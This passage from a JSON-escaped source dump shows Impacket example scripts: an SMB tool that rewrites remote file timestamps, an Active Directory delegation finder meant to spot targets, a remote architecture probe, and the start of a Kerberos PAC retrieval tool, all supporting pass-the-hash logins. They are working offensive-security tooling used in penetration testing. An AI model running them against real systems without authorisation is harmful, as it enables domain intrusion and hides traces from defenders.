FTtoPOSIX, SMBSetFileBasicInfo\nfrom impacket.smb3 import FILE_BASIC_INFORMATION\nfrom impacket.smb3structs import SMB2_DIALECT_311, SMB2_FILE_BASIC_INFO\n\n\nFILETIME_READ_ACTION = 'stat'\nFILETIME_WRITE_ACTION = 'touch'\nVALID_FILETIME_ACTIONS = (FILETIME_READ_ACTION, FILETIME_WRITE_ACTION)\n\n\n@dataclass\nclass FileTimes:\n creation_time: int = None\n last_access_time: int = None\n last_write_time: int = None\n change_time: int = None\n \n def pretty_repr(self):\n return \"\"\"\nCreationTime: {creation_time}\nLastAccessTime: {last_access_time}\nLastWriteTime: {last_write_time}\nChangeTime: {change_time}\n\"\"\".format(\n creation_time=\"N/A\" if self.creation_time is None else datetime.datetime.fromtimestamp(FTtoPOSIX(self.creation_time)).isoformat(),\n last_access_time=\"N/A\" if self.last_access_time is None else datetime.datetime.fromtimestamp(FTtoPOSIX(self.last_access_time)).isoformat(),\n last_write_time=\"N/A\" if self.last_write_time is None else datetime.datetime.fromtimestamp(FTtoPOSIX(self.last_write_time)).isoformat(),\n change_time=\"N/A\" if self.change_time is None else datetime.datetime.fromtimestamp(FTtoPOSIX(self.change_time)).isoformat(),\n )\n\ndef filetime_query(connection: smbconnection.SMBConnection, tid: int, fid: int) -> FileTimes:\n if connection.getDialect() == SMB_DIALECT:\n basicinfo = SMBQueryFileBasicInfo(connection.queryInfo(tid, fid, SMB_QUERY_FILE_BASIC_INFO))\n else:\n basicinfo = FILE_BASIC_INFORMATION(connection.queryInfo(tid, fid, SMB2_FILE_BASIC_INFO))\n \n filetimes = FileTimes(\n creation_time=basicinfo['CreationTime'],\n last_access_time=basicinfo['LastAccessTime'],\n last_write_time=basicinfo['LastWriteTime'],\n change_time=basicinfo['ChangeTime'],\n )\n \n logging.debug(f\"Got file / directory {filetimes = }\")\n return filetimes\n\ndef filetime_set(connection: smbconnection.SMBConnection, tid: int, fid: int, filetimes: FileTimes) -> None:\n if connection.getDialect() == SMB_DIALECT:\n info_data = SMBSetFileBasicInfo()\n info_data['ExtFileAttributes'] = 0\n fileInfoClass = SMB_SET_FILE_BASIC_INFO\n else:\n info_data = FILE_BASIC_INFORMATION()\n info_data['FileAttributes'] = 0\n fileInfoClass = SMB2_FILE_BASIC_INFO\n \n info_data['CreationTime'] = filetimes.creation_time if filetimes.creation_time is not None else 0\n info_data['LastAccessTime'] = filetimes.last_access_time if filetimes.last_access_time is not None else 0\n info_data['LastWriteTime'] = filetimes.last_write_time if filetimes.last_write_time is not None else 0\n info_data['ChangeTime'] = filetimes.change_time if filetimes.change_time is not None else 0\n \n logging.debug(f\"Setting file / directory filetimes = {filetimes}\")\n connection.setInfo(tid, fid, fileInfoClass, info_data)\n\n\ndef main():\n # Init the example's logger theme\n logger.init()\n print(version.BANNER)\n parser = argparse.ArgumentParser(add_help = True, description = \"File / Directory Timestamp Querying & Modification Utility implementation.\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument(\"share\", type=str, help=\"The share in which the desired file / directory to query or modify resides.\")\n parser.add_argument(\"path\", type=str, help=\"The path of the desired file / directory whose timestamps we wish to query or modify.\")\n \n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n group = parser.add_argument_group('authentication')\n group.add_argument('-hashes', action=\"store\", metavar=\"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='Don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n group.add_argument('-p', '--port', default=SMB_SESSION_PORT, type=int, metavar=\"destination port\", help='Destination port to connect to the SMB Server.')\n group.add_argument('-dc-ip', action='store', metavar=\"ip address\",\n help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '\n 'the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\",\n help='IP Address of the target machine. If omitted it will use whatever was specified as target. '\n 'This is useful when target is the NetBIOS name and you cannot resolve it')\n group.add_argument('-t', '--timeout', default=60, type=int, metavar=\"seconds\", help='Set connection timeout (seconds).')\n\n subcommands = parser.add_subparsers(dest=\"action\")\n \n query_parser = subcommands.add_parser(FILETIME_READ_ACTION, description=\"Show current file / directory timestamps.\")\n \n touch_parser = subcommands.add_parser(FILETIME_WRITE_ACTION, description=\"Modify file / directory timestamps.\")\n touch_parser.add_argument('-c', '--create', action='store_true', help='Change the \"CreationTime\" of the file / directory.')\n touch_parser.add_argument('-a', '--access', action='store_true', help='Change the \"LastAccessTime\" of the file / directory.')\n touch_parser.add_argument('-w', '--write', action='store_true', help='Change the \"LastWriteTime\" of the file / directory.')\n touch_parser.add_argument('-m', '--modify', action='store_true', help='Change the \"ChangeTime\" of the file / directory.')\n \n touch_parser.add_argument('-r', '--reference', default=None, metavar=('', ''), nargs=2, help='Specify a file / directory to reference and copy the timestamps of (format is ).')\n touch_parser.add_argument('-t', '--timestamp', default=None, metavar=\"STAMP\", help='Specify a timestamp to set for the selected filetimes (format: YYYY-MM-DD_HH:MM:SS.mmmmmm).')\n \n touch_parser.add_argument('-v', '--validate', action='store_true', help='Query the file after touching to verify the changes.')\n \n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n \n if options.debug is True:\n logging.getLogger().setLevel(logging.DEBUG)\n # Print the Library's installation path\n logging.debug(version.getInstallationPath())\n else:\n logging.getLogger().setLevel(logging.INFO)\n \n if options.action not in VALID_FILETIME_ACTIONS:\n logging.error(\"Invalid action '{action}'\".format(action=options.action)) \n\n domain, username, password, address = parse_target(options.target)\n\n if options.target_ip is None:\n options.target_ip = address\n\n if domain is None:\n domain = ''\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n if options.aesKey is not None:\n options.k = True\n\n if options.hashes is not None:\n lmhash, nthash = options.hashes.split(':')\n else:\n lmhash = ''\n nthash = ''\n \n share = options.share\n path = ntpath.normpath(options.path)\n \n if options.action == FILETIME_WRITE_ACTION:\n if all((options.reference, options.timestamp)) or all((not options.reference, not options.timestamp)):\n logging.error(\"Error! Must select one touch method! Either by reference or by timestamp!\")\n sys.exit(1)\n \n if options.reference:\n if len(options.reference) != 2:\n logging.error(\"Error! Reference must be in the following format: !\")\n sys.exit(1)\n else:\n ref_share = options.reference[0]\n ref_path = options.reference[1]\n elif options.timestamp:\n try:\n touch_timestamp = datetime.datetime.fromisoformat(options.timestamp)\n except Exception as exc:\n logging.error(\"Error parsing timestamp, make sure it is valid ISO format!\")\n logging.debug(str(exc))\n sys.exit(1)\n try:\n connection = smbconnection.SMBConnection(address, options.target_ip, sess_port=int(options.port), timeout=int(options.timeout))\n if options.k is True:\n connection.kerberosLogin(username, password, domain, lmhash, nthash, options.aesKey, options.dc_ip)\n else:\n connection.login(username, password, domain, lmhash, nthash)\n\n if options.action == FILETIME_WRITE_ACTION:\n if options.reference:\n try:\n ref_tid = connection.connectTree(ref_share)\n ref_fid = connection.openFile(\n ref_tid, \n ref_path, \n shareMode=FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, # Allow other processes to interact with the file / directory.\n creationOption=0, # Open both a file or a directory without limitation.\n desiredAccess=FILE_READ_ATTRIBUTES # Request only the permissions we need.\n )\n logging.debug(f\"Querying Reference FileTimes from '{ref_path}' on share '{ref_share}'!\")\n new_filetimes = filetime_query(connection, ref_tid, ref_fid)\n finally:\n connection.closeFile(ref_tid, ref_fid)\n connection.disconnectTree(ref_tid)\n elif options.timestamp:\n logging.debug(f\"Got TimeStamp: '{options.timestamp}'!\")\n new_filetimes = FileTimes(\n POSIXtoFT(touch_timestamp.timestamp()),\n POSIXtoFT(touch_timestamp.timestamp()),\n POSIXtoFT(touch_timestamp.timestamp()),\n POSIXtoFT(touch_timestamp.timestamp()),\n )\n \n # Keep only desired filetime changes.\n if not options.create:\n new_filetimes.creation_time = None\n if not options.access:\n new_filetimes.last_access_time = None\n if not options.write:\n new_filetimes.last_write_time = None\n if not options.modify:\n new_filetimes.change_time = None\n \n try:\n tid = connection.connectTree(share)\n \n if options.action == FILETIME_READ_ACTION:\n desiredAccess = FILE_READ_ATTRIBUTES\n elif options.action == FILETIME_WRITE_ACTION:\n desiredAccess = FILE_WRITE_ATTRIBUTES\n if options.validate:\n desiredAccess |= FILE_READ_ATTRIBUTES\n \n fid = connection.openFile(\n tid, \n path, \n shareMode=FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, # Allow other processes to interact with the file / directory.\n creationOption=0, # Open both a file or a directory without limitation.\n desiredAccess=desiredAccess # Request only the permissions we need.\n )\n \n if options.action == FILETIME_READ_ACTION:\n logging.info(f\"Queried FileTimes for '{path}' on share '{share}'!\")\n print(filetime_query(connection, tid, fid).pretty_repr())\n elif options.action == FILETIME_WRITE_ACTION:\n logging.info(f\"Changing FileTimes for '{path}' on share '{share}'!\")\n print(new_filetimes.pretty_repr())\n filetime_set(connection, tid, fid, new_filetimes)\n if options.validate:\n logging.info(f\"Validating Updated FileTimes for '{path}' on share '{share}'!\")\n print(filetime_query(connection, tid, fid).pretty_repr())\n finally:\n connection.closeFile(tid, fid)\n connection.disconnectTree(tid)\n connection.close()\n \n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "path": "examples/findDelegation.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This module will try to find all delegation relationships in a given domain.\n# Delegation relationships can provide info on specific users and systems to target,\n# as access to these systems will grant access elsewhere also.\n# Unconstrained, constrained, and resource-based constrained delegation types are queried\n# for and displayed.\n#\n# Author:\n# Dave Cossa (@G0ldenGunSec)\n# Based on GetUserSPNs.py by Alberto Solino (@agsolino)\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport logging\nimport sys\n\nfrom impacket import version\nfrom impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_identity, ldap_login\nfrom impacket.ldap import ldap, ldapasn1\nfrom impacket.ldap import ldaptypes\n\n\ndef checkIfSPNExists(ldapConnection, sAMAccountName, rights):\n # Check if SPN exists\n spnExists = \"-\"\n if rights == \"N/A\":\n query = \"(servicePrincipalName=HOST/%s)\" % sAMAccountName.rstrip(\"$\")\n else:\n query = \"(servicePrincipalName=%s)\"%rights\n\n respSpnExists = ldapConnection.search(\n searchFilter=query, \n attributes=[\"servicePrincipalName\", \"distinguishedName\"], \n sizeLimit=1\n )\n results = [item for item in respSpnExists if isinstance(item, ldapasn1.SearchResultEntry)]\n if len(results) != 0:\n spnExists = \"Yes\"\n else:\n spnExists = \"No\"\n \n return spnExists\n\n\nclass FindDelegation:\n @staticmethod\n def printTable(items, header):\n colLen = []\n for i, col in enumerate(header):\n rowMaxLen = max([len(row[i]) for row in items])\n colLen.append(max(rowMaxLen, len(col)))\n\n outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])\n\n # Print header\n print(outputFormat.format(*header))\n print(' '.join(['-' * itemLen for itemLen in colLen]))\n\n # And now the rows\n for row in items:\n print(outputFormat.format(*row))\n\n def __init__(self, username, password, user_domain, target_domain, cmdLineOptions):\n self.__username = username\n self.__password = password\n self.__domain = user_domain\n self.__target = None\n self.__targetDomain = target_domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = cmdLineOptions.aesKey\n self.__doKerberos = cmdLineOptions.k\n #[!] in this script the value of -dc-ip option is self.__kdcIP and the value of -dc-host option is self.__kdcHost\n self.__kdcIP = cmdLineOptions.dc_ip\n self.__kdcHost = cmdLineOptions.dc_host\n self.__requestUser = cmdLineOptions.user\n self.__disabled = cmdLineOptions.disabled\n if cmdLineOptions.hashes is not None:\n self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')\n\n # Create the baseDN\n domainParts = self.__targetDomain.split('.')\n self.baseDN = ''\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n # We can't set the KDC to a custom IP or Hostname when requesting things cross-domain\n # because then the KDC host will be used for both\n # the initial and the referral ticket, which breaks stuff.\n if user_domain != self.__targetDomain and (self.__kdcIP or self.__kdcHost):\n logging.warning('KDC IP address and hostname will be ignored because of cross-domain targeting.')\n self.__kdcIP = None\n self.__kdcHost = None\n\n def run(self):\n # Connect to LDAP\n ldapConnection = ldap_login(self.__target, self.baseDN, self.__kdcIP, self.__kdcHost, self.__doKerberos, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, target_domain=self.__targetDomain, fqdn=True)\n # updating \"self.__target\" as it may have changed in the ldap_login processing\n self.__target = ldapConnection._dstHost\n\n searchFilter = \"(&(|(UserAccountControl:1.2.840.113556.1.4.803:=16777216)(UserAccountControl:1.2.840.113556.1.4.803:=\" \\\n \"524288)(msDS-AllowedToDelegateTo=*)(msDS-AllowedToActOnBehalfOfOtherIdentity=*)\"\n\n if self.__disabled:\n searchFilter += \")(UserAccountControl:1.2.840.113556.1.4.803:=2)\"\n else:\n searchFilter += \")(!(UserAccountControl:1.2.840.113556.1.4.803:=2))\"\n\n if self.__requestUser is not None:\n searchFilter += '(sAMAccountName:=%s))' % self.__requestUser\n else:\n searchFilter += ')'\n\n try:\n resp = ldapConnection.search(searchFilter=searchFilter,\n attributes=['sAMAccountName',\n 'pwdLastSet', 'userAccountControl', 'objectCategory',\n 'msDS-AllowedToActOnBehalfOfOtherIdentity', 'msDS-AllowedToDelegateTo'],\n sizeLimit=999)\n except ldap.LDAPSearchError as e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')\n # We reached the sizeLimit, process the answers we have already and that's it. Until we implement\n # paged queries\n resp = e.getAnswers()\n pass\n else:\n raise\n\n answers = []\n logging.debug('Total of records returned %d' % len(resp))\n \n for item in resp:\n if isinstance(item, ldapasn1.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = ''\n userAccountControl = 0\n delegation = ''\n objectType = ''\n rightsTo = []\n protocolTransition = 0\n\n #after receiving responses we parse through to determine the type of delegation configured on each object\n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n sAMAccountName = str(attribute['vals'][0])\n mustCommit = True\n elif str(attribute['type']) == 'userAccountControl':\n userAccountControl = str(attribute['vals'][0])\n if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:\n delegation = 'Unconstrained'\n rightsTo.append(\"N/A\")\n elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:\n delegation = 'Constrained w/ Protocol Transition'\n protocolTransition = 1\n elif str(attribute['type']) == 'objectCategory':\n objectType = str(attribute['vals'][0]).split('=')[1].split(',')[0]\n elif str(attribute['type']) == 'msDS-AllowedToDelegateTo':\n if protocolTransition == 0:\n delegation = 'Constrained w/o Protocol Transition'\n for delegRights in attribute['vals']:\n rightsTo.append(str(delegRights))\n \n #not an elif as an object could both have rbcd and another type of delegation configured for the same object\n if str(attribute['type']) == 'msDS-AllowedToActOnBehalfOfOtherIdentity':\n rbcdRights = []\n rbcdObjType = []\n searchFilter = '(&(|'\n sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=bytes(attribute['vals'][0]))\n for ace in sd['Dacl'].aces:\n searchFilter += \"(objectSid=\"+ace['Ace']['Sid'].formatCanonical()+\")\"\n if self.__disabled:\n searchFilter += \")(UserAccountControl:1.2.840.113556.1.4.803:=2))\"\n else:\n searchFilter += \")(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))\"\n \n delegUserResp = ldapConnection.search(searchFilter=searchFilter,attributes=['sAMAccountName', 'objectCategory'],sizeLimit=999)\n for item2 in delegUserResp:\n if isinstance(item2, ldapasn1.SearchResultEntry) is not True:\n continue\n rbcdRights.append(str(item2['attributes'][0]['vals'][0]))\n rbcdObjType.append(str(item2['attributes'][1]['vals'][0]).split('=')[1].split(',')[0])\n\t\t\t\t\t\t\t\n if mustCommit is True:\n for rights, objType in zip(rbcdRights,rbcdObjType):\n spnExists = checkIfSPNExists(ldapConnection, sAMAccountName, rights)\n answers.append([rights, objType, 'Resource-Based Constrained', sAMAccountName, str(spnExists)])\n \n #print unconstrained + constrained delegation relationships\n if delegation in ['Unconstrained', 'Constrained w/o Protocol Transition', 'Constrained w/ Protocol Transition']:\n if mustCommit is True:\n for rights in rightsTo:\n spnExists = checkIfSPNExists(ldapConnection, sAMAccountName, rights)\n answers.append([sAMAccountName, objectType, delegation, rights, str(spnExists)])\n except Exception as e:\n logging.error('Skipping item, cannot process due to error %s' % str(e))\n pass\n\n if len(answers) > 0:\n self.printTable(answers, header=[\"AccountName\", \"AccountType\", \"DelegationType\", \"DelegationRightsTo\", \"SPN Exists\"])\n print('\\n\\n')\n else:\n print(\"No entries found!\")\n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Queries target domain for delegation relationships \")\n\n parser.add_argument('target', action='store', help='domain[/username[:password]]')\n parser.add_argument('-target-domain', action='store', help='Domain to query/request if different than the domain of the user. '\n 'Allows for retrieving delegation info across trusts.')\n\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n parser.add_argument('-user', action='store', help='Requests data for specific user')\n parser.add_argument('-disabled', action='store_true', help='Query disabled users too')\n group = parser.add_argument_group('authentication')\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n group.add_argument('-dc-ip', action='store', metavar='ip address', help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) '\n 'specified in the target parameter. Ignored'\n 'if -target-domain is specified.')\n group.add_argument('-dc-host', action='store', metavar='hostname', help='Hostname of the domain controller to use. '\n 'If ommited, the domain part (FQDN) '\n 'specified in the account parameter will be used')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n userDomain, username, password, _, _, options.k = parse_identity(options.target, options.hashes, options.no_pass, options.aesKey, options.k)\n\n if userDomain == '':\n logging.critical('userDomain should be specified!')\n sys.exit(1)\n\n if options.target_domain:\n targetDomain = options.target_domain\n else:\n targetDomain = userDomain\n\n try:\n executer = FindDelegation(username, password, userDomain, targetDomain, options)\n executer.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n" }, { "path": "examples/getArch.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script will connect against a target (or list of targets) machine/s and gather the OS architecture type\n# installed.\n# The trick has been discovered many years ago and is actually documented by Microsoft here:\n# https://msdn.microsoft.com/en-us/library/cc243948.aspx#Appendix_A_53\n# and doesn't require any authentication at all.\n#\n# Have in mind this trick will *not* work if the target system is running Samba. Don't know what happens with macOS.\n#\n# Author:\n# beto (@agsolino)\n#\n# Reference for:\n# RPCRT, NDR\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport logging\nimport sys\n\nfrom impacket import version\nfrom impacket.examples import logger\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5.transport import DCERPCTransportFactory\nfrom impacket.dcerpc.v5.epm import MSRPC_UUID_PORTMAP\n\n\nclass TARGETARCH:\n def __init__(self, options):\n self.__machinesList = list()\n self.__options = options\n self.NDR64Syntax = ('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0')\n\n def run(self):\n if self.__options.targets is not None:\n for line in self.__options.targets.readlines():\n self.__machinesList.append(line.strip(' \\r\\n'))\n else:\n self.__machinesList.append(self.__options.target)\n\n logging.info('Gathering OS architecture for %d machines' % len(self.__machinesList))\n logging.info('Socket connect timeout set to %s secs' % self.__options.timeout)\n\n for machine in self.__machinesList:\n try:\n stringBinding = r'ncacn_ip_tcp:%s[135]' % machine\n transport = DCERPCTransportFactory(stringBinding)\n transport.set_connect_timeout(int(self.__options.timeout))\n dce = transport.get_dce_rpc()\n dce.connect()\n try:\n dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=self.NDR64Syntax)\n except DCERPCException as e:\n if str(e).find('syntaxes_not_supported') >= 0:\n print('%s is 32-bit' % machine)\n else:\n logging.error(str(e))\n pass\n else:\n print('%s is 64-bit' % machine)\n\n dce.disconnect()\n except Exception as e:\n #import traceback\n #traceback.print_exc()\n logging.error('%s: %s' % (machine, str(e)))\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Gets the target system's OS architecture version\")\n parser.add_argument('-target', action='store', help='')\n parser.add_argument('-targets', type=argparse.FileType('r'), help='input file with targets system to query Arch '\n 'from (one per line). ')\n parser.add_argument('-timeout', action='store', default='2', help='socket timeout out when connecting to the target (default 2 sec)')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n if options.target is None and options.targets is None:\n logging.error('You have to specify a target!')\n sys.exit(1)\n\n try:\n getArch = TARGETARCH(options)\n getArch.run()\n except (Exception, KeyboardInterrupt) as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n sys.exit(0)\n" }, { "path": "examples/getPac.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script will get the PAC of the specified target user just having a normal authenticated user credentials.\n# It does so by using a mix of [MS-SFU]'s S4USelf + User to User Kerberos Authentication.\n# Original idea (or accidental discovery :) ) of adding U2U capabilities inside a S4USelf by Benjamin Delpy (@gentilkiwi)\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# References:\n# - U2U: https://tools.ietf.org/html/draft-ietf-cat-user2user-02\n# - [MS-SFU]: https://msdn.microsoft.com/en-us/library/cc246071.aspx\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport datetime\nimport logging\nimport random\nimport re\nimport struct\nimport sys\nfrom binascii import unhexlify\nfrom six import b\n\nfrom pyasn1.codec.der import decoder, encoder\nfrom pyasn1.type.univ import noValue\n\nfrom impacket import version\nfrom impacket.dcerpc.v5.rpcrt import TypeSerialization1\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_identity\nfrom impacket.krb5 import constants\nfrom impacket.krb5.asn1 import AP_REQ, AS_REP, TGS_REQ, Authenticator, TGS_REP, seq_set, seq_set_iter, PA_FOR_USER_ENC, \\\n EncTicketPart, AD_IF_RELEVANT, Ticket as TicketAsn1\nfrom impacket.krb5.crypto import Key, _enctype_table, _HMACMD5, Enctype\nfrom impacket.krb5.kerberosv5 import getKerberosTGT, sendReceive\nfrom impacket.krb5.pac import PACTYPE, PAC_INFO_BUFFER, KERB_VALIDATION_INFO, PAC_CLIENT_INFO_TYPE, PAC_CLIENT_INFO, \\\n PAC_SERVER_CHECKSUM, PAC_SIGNATURE_DATA, PAC_PRIVSVR_CHECKSUM, PAC_UPN_DNS_INFO, UPN_DNS_INFO\nfrom impacket.krb5.types import Principal, KerberosTime, Ticket\nfrom impacket.winregistry import hexdump\n\n\nclass S4U2SELF:\n\n def printPac(self, data):\n encTicketPart = decoder.decode(data, asn1Spec=EncTicketPart())[0]\n adIfRelevant = decoder.decode(encTicketPart['authorization-data'][0]['ad-data'], asn1Spec=AD_IF_RELEVANT())[\n 0]\n # So here we have the PAC\n pacType = PACTYPE(adIfRelevant[0]['ad-data'].asOctets())\n buff = pacType['Buffers']\n\n for bufferN in range(pacType['cBuffers']):\n infoBuffer = PAC_INFO_BUFFER(buff)\n data = pacType['Buffers'][infoBuffer['Offset']-8:][:infoBuffer['cbBufferSize']]\n if logging.getLogger().level == logging.DEBUG:\n print(\"TYPE 0x%x\" % infoBuffer['ulType'])\n if infoBuffer['ulType'] == 1:\n type1 = TypeSerialization1(data)\n # I'm skipping here 4 bytes with its the ReferentID for the pointer\n newdata = data[len(type1)+4:]\n kerbdata = KERB_VALIDATION_INFO()\n kerbdata.fromString(newdata)\n kerbdata.fromStringReferents(newdata[len(kerbdata.getData()):])\n kerbdata.dump()\n print()\n print('Domain SID:', kerbdata['LogonDomainId'].formatCanonical())\n print()\n elif infoBuffer['ulType'] == PAC_CLIENT_INFO_TYPE:\n clientInfo = PAC_CLIENT_INFO(data)\n if logging.getLogger().level == logging.DEBUG:\n clientInfo.dump()\n print()\n elif infoBuffer['ulType'] == PAC_SERVER_CHECKSUM:\n signatureData = PAC_SIGNATURE_DATA(data)\n if logging.getLogger().level == logging.DEBUG:\n signatureData.dump()\n print()\n elif infoBuffer['ulType'] == PAC_PRIVSVR_CHECKSUM:\n signatureData = PAC_SIGNATURE_DATA(data)\n if logging.getLogger().level == logging.DEBUG:\n signatureData.dump()\n print()\n elif infoBuffer['ulType'] == PAC_UPN_DNS_INFO:\n upn = UPN_DNS_INFO(data)\n if logging.getLogger().level == logging.DEBUG:\n upn.dump()\n print(data[upn['DnsDomainNameOffset']:])\n print()\n else:\n hexdump(data)\n\n if logging.getLogger().level == logging.DEBUG:\n print(\"#\"*80)\n\n buff = buff[len(infoBuffer):]\n\n\n def __init__(self, behalfUser, username = '', password = '', domain='', hashes = None):\n self.__username = username\n self.__password = password\n self.__domain = domain.upper()\n self.__behalfUser = behalfUser\n self.__lmhash = ''\n self.__nthash = ''\n if hashes is not None:\n self.__lmhash, self.__nthash = hashes.split(':')\n\n def dump(self):\n # Try all requested protocols until one works.\n\n userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,\n unhexlify(self.__lmhash), unhexlify(self.__nthash))\n\n decodedTGT = decoder.decode(tgt, asn1Spec = AS_REP())[0]\n\n # Extract the ticket from the TGT\n ticket = Ticket()\n ticket.from_asn1(decodedTGT['ticket'])\n\n apReq = AP_REQ()\n apReq['pvno'] = 5\n apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)\n\n opts = list()\n apReq['ap-options'] = constants.encodeFlags(opts)\n seq_set(apReq,'ticket', ticket.to_asn1)\n\n authenticator = Authenticator()\n authenticator['authenticator-vno'] = 5\n authenticator['crealm'] = str(decodedTGT['crealm'])\n\n clientName = Principal()\n clientName.from_asn1( decodedTGT, 'crealm', 'cname')\n\n seq_set(authenticator, 'cname', clientName.components_to_asn1)\n\n now = datetime.datetime.now(datetime.timezone.utc)\n authenticator['cusec'] = now.microsecond\n authenticator['ctime'] = KerberosTime.to_asn1(now)\n\n if logging.getLogger().level == logging.DEBUG:\n logging.debug('AUTHENTICATOR')\n print(authenticator.prettyPrint())\n print ('\\n')\n\n encodedAuthenticator = encoder.encode(authenticator)\n\n # Key Usage 7\n # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes\n # TGS authenticator subkey), encrypted with the TGS session\n # key (Section 5.5.1)\n encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)\n\n apReq['authenticator'] = noValue\n apReq['authenticator']['etype'] = cipher.enctype\n apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator\n\n encodedApReq = encoder.encode(apReq)\n\n tgsReq = TGS_REQ()\n\n tgsReq['pvno'] = 5\n tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)\n\n tgsReq['padata'] = noValue\n tgsReq['padata'][0] = noValue\n tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)\n tgsReq['padata'][0]['padata-value'] = encodedApReq\n\n # In the S4U2self KRB_TGS_REQ/KRB_TGS_REP protocol extension, a service\n # requests a service ticket to itself on behalf of a user. The user is\n # 